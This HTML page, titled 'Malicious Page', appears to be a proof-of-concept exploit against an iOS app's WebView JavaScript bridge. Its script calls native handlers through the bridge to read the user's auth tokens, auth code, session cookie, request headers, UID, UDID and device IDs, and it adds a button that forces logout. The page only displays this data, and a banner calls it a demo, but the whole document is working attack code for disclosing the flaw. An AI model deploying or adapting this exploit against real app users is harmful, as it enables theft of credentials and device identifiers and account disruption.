<!DOCTYPE html>
<html>

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1.0" charset="UTF-8">
    <style>
        body {
            margin: 0;
            font-family: Arial, Helvetica, sans-serif;
        }

        .container {
            width: 100%;
            padding: 15px;
        }

        @media screen and (min-width: 700px) {
            .container {
                width: 70%;
                margin: auto;
            }
        }

        p {
            white-space: pre-wrap; 
            word-wrap: break-word; 
            overflow-wrap: break-word; 
        }

        .bold-and-larger {
            font-weight: bold; 
            font-size: 1.5em; 
        }

        .larger {
            font-weight: bold; 
            font-size: 1.2em; 
        }

    </style>
    <title>Malicious Page</title>

</head>


<body>
    <h1>Malicious Page</h1>

    <p>!!! This is just a demo page, NO Sensitive Data will be stored!!!</p>

    <p><span class="bold-and-larger">An attacker can:</span></p>

    <p><span class="larger">Get Your Account Info:</span></p>
    <p style="font-size: 15px;" id="UID"></p>
    <p style="font-size: 15px;" id="NickName"></p>
    <p style="font-size: 15px;" id="UserName"></p>
    <p style="font-size: 15px;" id="AccountAvatarText">Your Avatar: </p>
    <div class="image-with-text">
        <img id="AccountAvatar" src="" alt="" width="30%" height="auto">
    </div>
    <p style="font-size: 15px;" id="PAuth"></p>
    <p style="font-size: 15px;" id="Auth"></p>
    <p style="font-size: 15px;" id="AuthCode"></p>
    <p style="font-size: 15px;" id="SCookie"></p>
    <p style="font-size: 15px;" id="RequestHeaders"></p>

    <p><span class="larger">Get Your Device Info:</span></p>
    <p style="font-size: 15px;" id="DeviceID"></p>
    <p style="font-size: 15px;" id="UDID"></p>
    <p style="font-size: 15px;" id="SMID"></p>

    <p><span class="larger">Log Out Your Account:</span></p>
    <input type="button" value="Log Out" id="LogOut" style="font-size: 20px; padding: 20px 25px;"/>

    <br><br><br>

    <script>
    window.onJsGetUserInfo = function (retval){
        document.getElementById("AccountAvatar").src = retval.sface.replace("\/", "/");
        document.getElementById("NickName").innerText = "Your NickName: " + retval.nick;
        document.getElementById("Auth").innerText = "Your Auth: \n" + retval.auth;
        document.getElementById("PAuth").innerText = "Your PAuth: " + retval.pauth;
        document.getElementById("UserName").innerText = "Your UserName: " + retval.username;
        document.getElementById("AuthCode").innerText = "Your AuthCode: " + retval.auth_code;
        document.getElementById("SCookie").innerText = "Your SCookie: " + retval.scookie;

    }   
    window.webkit.messageHandlers.iOS_Youkandian_Native.postMessage(JSON.stringify({
        eventName: "onJsGetUserInfo",
        params: {}
    }));


    window.onJsGetUid = function (retval){
        document.getElementById("UID").innerText = "Your UID: " + retval;
    }
    window.webkit.messageHandlers.iOS_Youkandian_Native.postMessage(JSON.stringify({
        eventName: "onJsGetUid",
        params: {}
    }));

    document.getElementById("LogOut").onclick = function () {
        window.webkit.messageHandlers.iOS_Youkandian_Native.postMessage(JSON.stringify({
            eventName: "onJsLogout",
            params: {}
        }));
    }

    window.onJsGetEnv = function(retval){
        document.getElementById("SMID").innerText = "Your SMID: \n" + retval.smId;
        document.getElementById("UDID").innerText = "Your UDID: \n" + retval.udid;
        document.getElementById("DeviceID").innerText = "Your DeviceID: \n" + retval.deviceId;
    }
    window.webkit.messageHandlers.iOS_Youkandian_Native.postMessage(JSON.stringify({
        eventName: "onJsGetEnv",
        params: {}
    }));


    window.onJsGetCommonRequestHeaders = function(retval){
        document.getElementById("RequestHeaders").innerText = "Your RequestHeaders: " + JSON.stringify(retval);
    }
    window.webkit.messageHandlers.iOS_Youkandian_Native.postMessage(JSON.stringify({
        eventName: "onJsGetCommonRequestHeaders",
        params: {}
    }));


    </script>

</body>

</html>